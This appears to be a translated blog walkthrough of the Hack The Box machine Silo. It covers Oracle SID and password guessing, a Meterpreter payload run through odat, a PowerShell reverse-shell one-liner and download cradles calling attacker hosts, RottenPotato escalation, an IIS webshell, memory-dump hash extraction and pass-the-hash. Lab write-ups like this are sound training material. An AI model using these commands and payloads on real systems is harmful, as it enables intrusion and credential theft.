This box involves an Oracle database, which I had never touched before, so it was a chance to get familiar with how to work with one. It also involves memory forensics; at the last Meiya Cup I had only skimmed the surface of 取证大师 (Forensics Master), so this was also an opportunity to properly learn some forensics.
nmap -sC -sV 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-09 13:15 CST
Nmap scan report for 10.10.10.82
Host is up (0.073s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-02-09T05:17:36
|_  start_date: 2021-02-09T03:07:49

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.90 seconds
Port 80 is IIS 8.5. A search turns up nothing exploitable for that version on its own, so it looks like a rabbit hole (it only becomes useful later as a place to drop a webshell once we have file write through Oracle).
135 and the five-digit ports are all MSRPC; there is nothing exploitable there, and an anonymous rpcclient session is refused:
rpcclient -U '' 10.10.10.82
Enter WORKGROUP\'s password:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
139 and 445 tell us the OS family (Windows Server 2008 R2 - 2012), but null and guest sessions are denied, so there are no shares we can enumerate:
$ smbclient -L //$ip/
Enter WORKGROUP\chris's password:
session setup failed: NT_STATUS_ACCESS_DENIED

┌─[root@kali]─[~]
└──╼ $ smbmap -H $ip
[!] 445 not open on 10.10.10.82....
1521 is oracle-tns, the Oracle TNS listener, i.e. the port an Oracle database accepts client connections on. This is the way in: the listener lets us guess the instance SID, then guess credentials, and an account that is allowed to connect as sysdba can read, write and execute files on the host.
This route does not require first getting a shell as the IIS web user.
First install odat. On Kali just run odat and it offers to install itself.
Then start using it. SID guessing first:
~ odat sidguesser -s 10.10.10.82

[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...                    ########## | ETA:  00:00:01
[+] 'XEXDB' is a valid SID. Continue...
100% |#######################################################| Time: 00:02:22
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |#######################################################| Time: 00:00:05
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue...                    ####       | ETA:  00:00:15
100% |#######################################################| Time: 00:02:22
[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB
Two SIDs were found; after trying both, XE is the one that works (XEXDB is the XML DB service of the same instance).
The same SID guessing can be done from msf with auxiliary/scanner/oracle/sid_enum; remember to give it a larger wordlist than the default. The bundled list is at "/usr/share/metasploit-framework/data/wordlists/sid.txt".
User and password guessing

Next, guess usernames and passwords with odat's built-in account list:
➜ ~ sudo odat passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file /usr/share/odat/accounts/accounts_small.txt
[+] Valid credentials found: scott/tiger. Continue...
I also came across another way of using odat, the all module, which runs every check in one go. I will go through it in detail in a separate article on odat.
odat all -s 10.10.10.82 -p 1521 -d XE
--snipped--
[+] Valid credentials found: scott/tiger. Continue...
--snipped--
There is also a password brute-force script that 0xdf wrote himself, from HTB: Silo | 0xdf hacks stuff:
#!/usr/bin/env python
import cx_Oracle
import sys
from multiprocessing import Pool

MAX_PROC = 50
host = "10.10.10.82"
sid = "XE"


def usage():
    print("{} [ip] [wordlist]".format(sys.argv[0]))
    print("  wordlist should be of the format [username]:[password]")
    sys.exit(1)


def scan(userpass):
    # one user:pass pair per line; a successful connect means valid credentials
    u, p = userpass.split(':')[:2]
    try:
        conn = cx_Oracle.connect('{user}/{pass_}@{ip}/{sid}'.format(user=u, pass_=p, ip=host, sid=sid))
        conn.close()
        return u, p, True
    except cx_Oracle.DatabaseError:
        return u, p, False


def main(target, userpassfile, nprocs=MAX_PROC):
    # scan() reads the module-level host, so set it from argv before forking the pool
    global host
    host = target
    with open(userpassfile, 'r') as f:
        userpass = f.read().rstrip().replace('\r', '').split('\n')
    pool = Pool(processes=nprocs)
    for username, pass_, status in pool.imap_unordered(scan, userpass):
        if status:
            print("Found {} / {}\n\n".format(username, pass_))
        else:
            sys.stdout.write("\r {}/{}          ".format(username, pass_))
            sys.stdout.flush()


if __name__ == '__main__':
    if len(sys.argv) != 3:
        usage()
    main(sys.argv[1], sys.argv[2])
There is not much in the database itself, so the path here is to upload a malicious executable through Oracle and have the database run it:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.5 lport=4445 -f exe > 1.exe
odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ 1.exe ~/1.exe
odat externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ 1.exe
Before running the externaltable step, start the msf handler with the same payload, LHOST and LPORT that were baked into 1.exe. The handler below listens on 10.10.16.7, so the executable must have been generated with that address; if the two do not match the stage simply never calls back.
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.16.7
lhost => 10.10.16.7
msf6 exploit(multi/handler) > set lport 4445
lport => 4445
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.7:4445
[*] Sending stage (200262 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.16.7:4445 -> 10.10.10.82:49167) at 2022-01-05 14:24:14 +0800
That's all there is to it.
odat can also read files directly, without needing a shell at all:
odat ctxsys -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --getFile c:\\users\\administrator\\desktop\\root.txt

[1] (10.10.10.82:1521): Read the c:\users\administrator\desktop\root.txt file on the 10.10.10.82 server
[+] Data stored in the c:\users\administrator\desktop\root.txt file (escape char replace by '\n'):
82FDAB14799E467FCE23979F9C1BF92C
Thanks to 0xdf for the approach.
If instead we land in a low-privilege shell (for example as the IIS application pool identity, via the webshell route at the end of this post) and whoami /priv shows SeImpersonatePrivilege enabled, we can escalate with RottenPotato: that privilege is what the Potato family abuses to impersonate a SYSTEM token.
PS C:\windows\system32\inetsrv> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
Download MSFRottenPotato.exe. The repo linked here is GitHub - decoder-it/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.
Then write a .bat file that launches a PowerShell reverse shell (the %% below is how a literal % is escaped inside a batch file):
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.14',8085); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ ;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}; $client.Close()"
Then download both onto the target:
PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/rev.bat', 'C:\temp\rev.bat')
PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/MSFRottenPotato.exe', 'C:\temp\lp.exe')
And run it:
PS C:\temp> c:\temp\lp.exe * \temp\rev.bat
connect sock
CreateIlok: 0 0
start RPC connection
CreateDoc: 0 0
COM -> bytes received: 116
RPC -> bytes Sent: 116
RPC -> bytes received: 84
COM -> bytes sent: 84
COM -> bytes received: 24
RPC -> bytes Sent: 24
RPC -> bytes received: 132
COM -> bytes sent: 132
COM -> bytes received: 127
RPC -> bytes Sent: 127
RPC -> bytes received: 196
COM -> bytes sent: 196
COM -> bytes received: 243
RPC -> bytes Sent: 243
RPC -> bytes received: 192
COM -> bytes sent: 192
COM -> bytes received: 72
RPC -> bytes Sent: 72
RPC -> bytes received: 60
COM -> bytes sent: 60
COM -> bytes received: 42
RPC -> bytes Sent: 42
RPC -> bytes received: 56
COM -> bytes sent: 56
CoGet: -2147022986 0
[+] authresult != -1
[+] Elevated Token tye:2
[+] DuplicateTokenEx :1 0
[+] Duped Token type:1
[+] Running \temp\rev.bat sessionId 1
[+] CreateProcessWithTokenW OK
Auth result: 0
Return code: 0
Last error: 0
Remember to have nc listening before running it:
root@kali:~/hackthebox/silo-10.10.10.82# nc -lnvp 8085
listening on [any] 8085 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.82] 49181
PS C:\Windows\system32> whoami
nt authority\system
On the user's desktop there is not only the flag but also an Oracle issue.txt file:
dir \users\Phineas\Desktop

    Directory: C:\users\Phineas\Desktop

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         1/5/2018  10:56 PM        300 Oracle issue.txt
-a---         1/4/2018   9:41 PM         32 user.txt
It says a full memory dump was shared with a support vendor through Dropbox, and the link password is in the same note:
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):

Dropbox link provided to vendor (and password under separate cover).

Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0

link password:
£%Hm8646uC$
Download it and try memory forensics with Volatility. First identify the right profile with kdbgscan:
volatility kdbgscan -f SILO-20180105-221806.dmp
**************************************************
Instantiating KDBG using: Unnamed AS Win2012R2x64_18340 (6.3.9601 64bit)
Offset (V)                    : 0xf80078520a30
Offset (P)                    : 0x2320a30
KdCopyDataBlock (V)           : 0xf8007845f9b0
Block encoded                 : Yes
Wait never                    : 0xd08e8400bd4a143a
Wait always                   : 0x17a949efd11db80
KDBG owner tag check          : True
Profile suggestion (KDBGHeader): Win2012R2x64_18340
Version64                     : 0xf80078520d90 (Major: 15, Minor: 9600)
Service Pack (CmNtCSDVersion) : 0
Build string (NtBuildLab)     : 9600.16384.amd64fre.winblue_rtm.
PsActiveProcessHead           : 0xfffff80078537700 (51 processes)
PsLoadedModuleList            : 0xfffff800785519b0 (148 modules)
KernelBase                    : 0xfffff8007828a000 (Matches MZ: True)
Major (OptionalHeader)        : 6
Minor (OptionalHeader)        : 3
KPCR                          : 0xfffff8007857b000 (CPU 0)
KPCR                          : 0xffffd000207e8000 (CPU 1)
**************************************************
...
Next, pull the account hashes. hivelist gives the virtual addresses of the registry hives; hashdump needs the SYSTEM hive (-y, for the boot key) and the SAM hive (-s):
volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hivelist
Volatility Foundation Volatility Framework 2.6
Virtual            Physical           Name
------------------ ------------------ ----
0xffffc0000100a000 0x000000000d40e000 \??\C:\Users\Administrator\AppData\Local\Microsoft\Windows\UsrClass.dat
0xffffc000011fb000 0x0000000034570000 \SystemRoot\System32\config\DRIVERS
0xffffc00001600000 0x000000003327b000 \??\C:\Windows\AppCompat\Programs\Amcache.hve
0xffffc0000001e000 0x0000000000b65000 [no name]
0xffffc00000028000 0x0000000000a70000 \REGISTRY\MACHINE\SYSTEM
0xffffc00000052000 0x000000001a25b000 \REGISTRY\MACHINE\HARDWARE
0xffffc000004de000 0x0000000024cf8000 \Device\HarddiskVolume1\Boot\BCD
0xffffc00000103000 0x000000003205d000 \SystemRoot\System32\Config\SOFTWARE
0xffffc00002c43000 0x0000000028ecb000 \SystemRoot\System32\Config\DEFAULT
0xffffc000061a3000 0x0000000027532000 \SystemRoot\System32\Config\SECURITY
0xffffc00000619000 0x0000000026cc5000 \SystemRoot\System32\Config\SAM
0xffffc0000060d000 0x0000000026c93000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xffffc000006cf000 0x000000002688f000 \SystemRoot\System32\Config\BBI
0xffffc000007e7000 0x00000000259a8000 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xffffc00000fed000 0x000000000d67f000 \??\C:\Users\Administrator\ntuser.dat

root@kali:~/hackthebox/silo-10.10.10.82# volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
Finally, log in with psexec.py by passing the hash. No cracking is needed: the NT hash is what NTLM authentication actually uses, so the dump alone is enough to authenticate as Administrator.
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -target-ip 10.10.10.82 administrator@10.10.10.82
Impacket v0.9.16-dev - Copyright 2002-2018 Core Security Technologies

[*] Requesting shares on 10.10.10.82.....
[*] Found writable share ADMIN$
[*] Uploading file XryxqKFr.exe
[*] Opening SVCManager on 10.10.10.82.....
[*] Creating service PAYb on 10.10.10.82.....
[*] Starting service PAYb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
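A small triage of the hashdump output, as an added example (my own code, not from the original post or from Volatility/Impacket). The hash lines are the ones printed by hashdump above; the candidate wordlist is constructed. It carries its own MD4 because the NT hash is MD4 over the UTF-16LE password and hashlib's md4 is often unavailable under OpenSSL 3. The point it makes: the LM field aad3b435b51404eeaad3b435b51404ee is the LM hash of the empty string (LM storage disabled), Guest's NT hash is the hash of an empty password, and every NT hash is directly usable for pass-the-hash whether or not a wordlist ever cracks it.

```python
import re
import struct

# Hashdump lines from the Volatility output above (page data, not constructed).
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
"""

# LM hash of the empty string: the SAM stores no usable LM hash for this account.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); NT hashes are MD4 over the UTF-16LE password."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    F = lambda x, y, z: (x & y) | ((~x & mask) & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for f, k, order, shifts in rounds:
            for i in range(16):
                t = (-i) % 4  # register updated this step cycles a, d, c, b
                x, y, z = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
                v[t] = rotl((v[t] + f(x, y, z) + X[order[i]] + k) & mask, shifts[i % 4])
        state = [(s + w) & mask for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash as the lowercase hex string hashdump prints."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hashdump(text: str):
    """user:rid:lm:nt::: lines -> list of dicts; blank or malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = re.match(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):", line.strip())
        if m:
            rows.append({"user": m.group(1), "rid": int(m.group(2)),
                         "lm": m.group(3).lower(), "nt": m.group(4).lower()})
    return rows


def triage(rows, candidates):
    """Per account: LM disabled?, empty password?, and which candidate (if any)
    reproduces the NT hash. 'pth_usable' is True for every account with an NT
    hash, because NTLM authenticates with the hash itself."""
    table = {nt_hash(p): p for p in candidates}
    empty_nt = nt_hash("")
    out = {}
    for r in rows:
        out[r["user"]] = {
            "lm_disabled": r["lm"] == EMPTY_LM,
            "empty_password": r["nt"] == empty_nt,
            "cracked": table.get(r["nt"]),
            "pth_usable": True,
        }
    return out


if __name__ == "__main__":
    wordlist = ["tiger", "password", "Welcome1"]  # constructed, not from the box
    for user, info in triage(parse_hashdump(HASHDUMP), wordlist).items():
        print(user, info)
```

Running it shows Guest flagged as an empty password and nothing else cracked by the toy wordlist, which is exactly why the psexec.py step above passes the hash instead of a password.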
Because I leaned on the odat scripts directly, I never actually logged into the database even after getting credentials. While tidying up these notes I looked at how others did it and put together the steps for logging in (I did not even have Oracle installed on my machine, and installing the database later was genuinely painful).
HTB: Silo - PurpleRabbit explains a way to log in with just sqlplus, without installing the full Oracle database. Here is that method:
sqlplus scott/tiger@10.10.10.82:1521/XE

SQL> select table_name from user_tables;

TABLE_NAME
------------------------------
DEPT
EMP
BONUS
SALGRADE

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO
There is nothing of interest in the database: scott only has the stock demo tables and the CONNECT and RESOURCE roles. What makes the account dangerous is that the instance lets scott connect AS SYSDBA, which is why every odat command above passes --sysdba. That turns a low-privilege database login into file read, file write and code execution on the Windows host.
The idea below comes from 0xdf.
Using odat's dbmsadvisor module we can write a file straight into the IIS webroot:
root@kali:~/hackthebox/silo-10.10.10.82# odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\\inetpub\\wwwroot 0xdf.aspx /usr/share/webshells/aspx/cmdasp.aspx

[1] (10.10.10.82:1521): Put the /usr/share/webshells/aspx/cmdasp.aspx local file in the C:\inetpub\wwwroot path (named 0xdf.aspx) of the 10.10.10.82 server
[+] The /usr/share/webshells/aspx/cmdasp.aspx local file was put in the remote C:\inetpub\wwwroot path (named 0xdf.aspx)
This uploads a web command-execution script (cmdasp.aspx from Kali's bundled webshells), which the IIS 8.5 instance on port 80 then serves, giving us command execution as the IIS worker.
Through that web command line we have the target fetch our reverse shell script.
Serve it locally:

python -m SimpleHTTPServer 80

then run in the webshell:

powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.15.48:80/Invoke-PowerShellTcp.ps1')
That gives us a reverse shell as the IIS application pool user, which is where the whoami /priv check and the RottenPotato escalation above come in.